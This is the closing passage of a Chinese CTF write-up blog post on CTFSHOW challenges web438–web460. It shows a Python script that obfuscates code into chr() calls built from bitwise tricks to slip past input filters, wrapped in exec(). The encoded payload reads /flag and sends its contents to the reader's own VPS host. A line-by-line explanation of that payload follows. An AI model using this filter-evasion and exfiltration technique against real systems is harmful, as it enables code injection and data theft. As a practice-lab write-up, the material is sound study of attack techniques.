class="keyword">if</span> number <span class="keyword">in</span> [-<span class="number">2</span>, -<span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>]:</span><br><span class="line">        <span class="keyword">return</span> [<span class="string">&quot;~int(True)&quot;</span>, <span class="string">&quot;~int(False)&quot;</span>,</span><br><span class="line">                <span class="string">&quot;int(False)&quot;</span>, <span class="string">&quot;int(True)&quot;</span>][number + <span class="number">2</span>]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> number % <span class="number">2</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;~%s&quot;</span> % getNumber3(~number)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;(%s&lt;&lt;(int(True)))&quot;</span> % getNumber3(number / <span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getNumber2</span>(<span class="params">number</span>):</span><br><span class="line">    number = <span class="built_in">int</span>(number)</span><br><span class="line">    <span class="keyword">if</span> number <span class="keyword">in</span> [-<span class="number">2</span>, -<span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>]:</span><br><span class="line">        <span class="keyword">return</span> [<span class="string">&quot;~([]&lt;())&quot;</span>, <span class="string">&quot;~([]&lt;[])&quot;</span>,</span><br><span class="line">                <span class="string">&quot;([]&lt;[])&quot;</span>, <span class="string">&quot;([]&lt;())&quot;</span>][number + <span class="number">2</span>]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> number % <span class="number">2</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;~%s&quot;</span> % getNumber2(~number)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;(%s&lt;&lt;([]&lt;()))&quot;</span> % getNumber2(number / <span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">s = <span class="string">&#x27;import urllib.request;import ssl;f=open(&quot;/flag&quot;).read();context = ssl._create_unverified_context();url = &quot;http://你的vps地址:端口?p=&quot;+f;request = urllib.request.Request(url);response = urllib.request.urlopen(url=request,context=context)&#x27;</span></span><br><span class="line"></span><br><span class="line">res = <span class="string">&#x27;str().join([&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">    res += <span class="string">f&quot;chr(<span class="subst">&#123;getNumber3(<span class="built_in">ord</span>(i))&#125;</span>),&quot;</span></span><br><span class="line">res = res[:-<span class="number">1</span>]</span><br><span class="line">res += <span class="string">&#x27;])&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;exec(&quot;</span>+res+<span class="string">&quot;)&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>把结果拼接进Body然后POST发送</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=你的代码运行结果</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250827152501169.png"></p>
<p>简单解释一下这个代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&#x27;import urllib.request;import ssl;f=open(&quot;/flag&quot;).read();context = ssl._create_unverified_context();url = &quot;http://你的vps地址:端口?p=&quot;+f;request = urllib.request.Request(url);response = urllib.request.urlopen(url=request,context=context)&#x27;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><code>import urllib.request</code>：导入用于打开和读取 URL 的模块</li>
<li><code>import ssl</code>：导入处理 TLS&#x2F;SSL 连接的模块</li>
<li><code>f = open(&quot;/flag&quot;).read()</code>：打开根目录下的 <code>flag</code> 文件，读取内容，并赋值给变量 <code>f</code></li>
<li><code>context = ssl._create_unverified_context()</code>：创建一个不验证 SSL 证书的上下文环境，避免因证书问题阻塞请求</li>
<li><code>request = urllib.request.Request(url)</code>：创建针对该 URL 的 HTTP 请求</li>
<li><code>response = urllib.request.urlopen(url=request, context=context)</code>：发送请求并获取响应，使用前面创建的 SSL 上下文</li>
</ul>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>yu22x：<a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/112692697">CTFSHOW其他篇</a></p>
<p>Y4tacker：<a target="_blank" rel="noopener" href="https://blog.csdn.net/solitudi/article/details/113778651">[CTFSHOW]CTFSHOW-其他WP</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>CTFSHOW | 其他篇题解（三）web438 - web460</p><p><a href="https://waynejoon.github.io/posts/ctfshow-others-3-web438-web460/">https://waynejoon.github.io/posts/ctfshow-others-3-web438-web460/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>WayneJoon.H</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-08-27</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/CTFSHOW/">CTFSHOW, </a><a class="link-muted" rel="tag" href="/tags/CTF%E7%BB%83%E4%B9%A0/">CTF练习 </a></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/posts/Xuanji-CTF-Windows-Security-Log-Analysis/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">玄机靶场 | 日志分析-windows日志分析base</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/ctfshow-others-2-web417-web437/"><span class="level-item">CTFSHOW | 其他篇题解（二）web417 - web437</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/waynejoon.jpg" alt="WayneJoon.H"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">WayneJoon.H</p><p class="is-size-6 is-block">记录学习生活</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">20</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">3</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">5</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/waynejoon" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#前言"><span class="level-left"><span class="level-item">1</span><span class="level-item">前言</span></span></a></li><li><a class="level is-mobile" href="#题目列表"><span class="level-left"><span class="level-item">2</span><span class="level-item">题目列表</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#web438"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">web438</span></span></a></li><li><a class="level is-mobile" href="#web439"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">web439</span></span></a></li><li><a class="level is-mobile" href="#web440"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">web440</span></span></a></li><li><a class="level is-mobile" href="#web441"><span class="level-left"><span class="level-item">2.4</span><span class="level-item">web441</span></span></a></li><li><a class="level is-mobile" href="#web442"><span class="level-left"><span class="level-item">2.5</span><span class="level-item">web442</span></span></a></li><li><a class="level is-mobile" href="#web443"><span class="level-left"><span class="level-item">2.6</span><span class="level-item">web443</span></span></a></li><li><a class="level is-mobile" href="#web444"><span class="level-left"><span class="level-item">2.7</span><span class="level-item">web444</span></span></a></li><li><a class="level is-mobile" href="#web445"><span class="level-left"><span class="level-item">2.8</span><span class="level-item">web445</span></span></a></li><li><a class="level is-mobile" href="#web446"><span class="level-left"><span class="level-item">2.9</span><span class="level-item">web446</span></span></a></li><li><a class="level is-mobile" href="#web447"><span class="level-left"><span class="level-item">2.10</span><span class="level-item">web447</span></span></a></li><li><a class="level is-mobile" href="#web448"><span class="level-left"><span class="level-item">2.11</span><span class="level-item">web448</span></span></a></li><li><a class="level is-mobile" href="#web449"><span class="level-left"><span class="level-item">2.12</span><span class="level-item">web449</span></span></a></li><li><a class="level is-mobile" href="#web450"><span class="level-left"><span class="level-item">2.13</span><span class="level-item">web450</span></span></a></li><li><a class="level is-mobile" href="#web451"><span class="level-left"><span class="level-item">2.14</span><span class="level-item">web451</span></span></a></li><li><a class="level is-mobile" href="#web452"><span class="level-left"><span class="level-item">2.15</span><span class="level-item">web452</span></span></a></li><li><a class="level is-mobile" href="#web453"><span class="level-left"><span class="level-item">2.16</span><span class="level-item">web453</span></span></a></li><li><a class="level is-mobile" href="#web454"><span class="level-left"><span class="level-item">2.17</span><span class="level-item">web454</span></span></a></li><li><a class="level is-mobile" href="#web455"><span class="level-left"><span class="level-item">2.18</span><span class="level-item">web455</span></span></a></li><li><a class="level is-mobile" href="#web456"><span class="level-left"><span class="level-item">2.19</span><span class="level-item">web456</span></span></a></li><li><a class="level is-mobile" href="#web457"><span class="level-left"><span class="level-item">2.20</span><span class="level-item">web457</span></span></a></li><li><a class="level is-mobile" href="#web458"><span class="level-left"><span class="level-item">2.21</span><span class="level-item">web458</span></span></a></li><li><a class="level is-mobile" href="#web459"><span class="level-left"><span class="level-item">2.22</span><span class="level-item">web459</span></span></a></li><li><a class="level is-mobile" href="#web460"><span class="level-left"><span class="level-item">2.23</span><span class="level-item">web460</span></span></a></li></ul></li><li><a class="level is-mobile" href="#参考"><span class="level-left"><span class="level-item">3</span><span class="level-item">参考</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">WayneJH</a><p class="is-size-7"><span>&copy; 2025 WayneJoon.H</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script data-pjax src="/js/busuanzi-fix.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>